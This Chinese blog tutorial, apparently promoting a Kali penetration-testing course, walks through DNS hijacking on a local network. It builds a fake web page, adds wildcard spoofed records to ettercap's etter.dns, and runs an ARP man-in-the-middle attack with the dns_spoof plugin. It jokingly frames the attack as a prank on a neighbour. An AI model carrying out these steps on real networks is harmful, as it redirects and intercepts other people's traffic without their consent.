前言:
此刻兄弟们对“apache2关闭目录浏览”大致比较注意,朋友们都需要学习一些“apache2关闭目录浏览”的相关知识。那么小编也在网上搜集了一些关于“apache2关闭目录浏览””的相关知识,希望兄弟们能喜欢,兄弟们一起来了解一下吧!谁说没有黑客没有浪漫?先听首BGM膨胀下。。。
DNS域名攻击
在我的视频专栏课程《白帽黑客kali渗透指南》,我已经深入浅出地讲解了ARP缓存攻击,使用我们的kali就能充当中间人,全面截获目标主机和互联网之间的流量数据,上网内容和图片也是一览无遗!想想也是细思极恐,这里重申一下,仅仅用作安全测试,切勿用于不当目的!
还没有学习ARP攻击的小白,可以点击下方《白帽黑客kali渗透指南》的专栏卡片进入。
ARP既然这么厉害,那DNS又是何物?DNS其实和ARP是类似的。
ARP协议指的是主机ip地址和MAC地址的关系,需要确定IP地址和MAC进行对应才能完成指定通信;而DNS顾名思义就是指DNS域名和IP的关系,将你访问的域名(www。baidu。com)通过域名解析服务器(又叫DNS域名解析服务器)将这个域名进行解析(先在本地域名解析服务器缓存中寻找该域名对应的IP地址,没有发现,就会去互联网的域名解析服务器查找,直到成功!),此时会解析成一个固定的真实的ip地址,然后实现双向通信。
你想一下,如果此时有恶意攻击者(我们的kali)充当中间人,在网段中进行广播,将自己伪装成一个本地域名解析服务器,然后把kali的ip和所有域名进行绑定,这就是实打实的DNS域名劫持攻击!
实战演示DNS域名劫持首先要在kali本地的web根目录下制作一张山寨的冒牌网页(不然人家访问个啥?)
在kali的文本编辑器中输入以下代码:
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/heml; charset=utf-8">
<title>I love you</title>
<meta name="keywords" content="test">
<meta name="description" content="test website">
</head>
<body>
<h1>不好意思,我爱你,所以黑了你</h1>
<a target="-blank" title="I LOVE YOU"><img src="./biaobai.png"></a>
<embed src="./biaobai.wav" autostart="true" loop="true" hidden="true"></embed>
</body>
<footer>
<p>来自隔壁小哥哥的爱</p>
</footer>
</html>
上图大概内容:这是一个html的网页,放置一张告白图片,添加一段音乐。
然后保存在主目录下!然后你将制作好的图片和音乐文件也要放在主目录下,如下图:
然后你要将这个index.html文件、以及代码中涉及到的图片biaobai.png、音乐资源文件biaobai.wav都要拷贝到kali的/var/www/html下,也是kali web服务器的apache2根目录。
开启apache2网页服务
Kali终端下输入:
su,进入root用户service apache2 start开启DNS欺骗—ettercap
首先配置ettercap的dns域名解析文件
在kali终端中输入:
vim /etc/ettercap/etter.dns
然后进入编辑界面:
后面添加:* A 192.168.31.206 (这是你kali的IP)* PTR 192.168.31.206注意:* 代表所有的域名
如图所示即可!添加这两行即可!
保存退出vim编辑!已经完成ettercap的dns攻击配置!
开始攻击:
Kali终端下输入:
Ettercap -G
配置ettercap
设置插件:dns_spoof
扫描主机列表hosts-scan for hosts
设置目标1网关ip 192.168.31.1
设置目标2ip 192.168.31.6
设置ARP中间人
访问百度,复现DNS域名攻击
我们接下来模拟靶机win10通过浏览器来上网,比如浏览百度的首页:
在win10的浏览器下输入:www,baidu,com回车!
好无情,我们看到的不再是百度首页,而是我们kali web根目录下的表白网页,还自带"夜空最闪亮的星"!你说隔壁妹妹会不会惊喜?还是破口大骂"渣男!"?
小白嘿客我想说
想学习更多白帽黑客kali渗透技术的小白,点击小白都能学的kali渗透实战就能加入学习!
关注我,你能学到更多,给个赞,评论吧!
标签: #apache2关闭目录浏览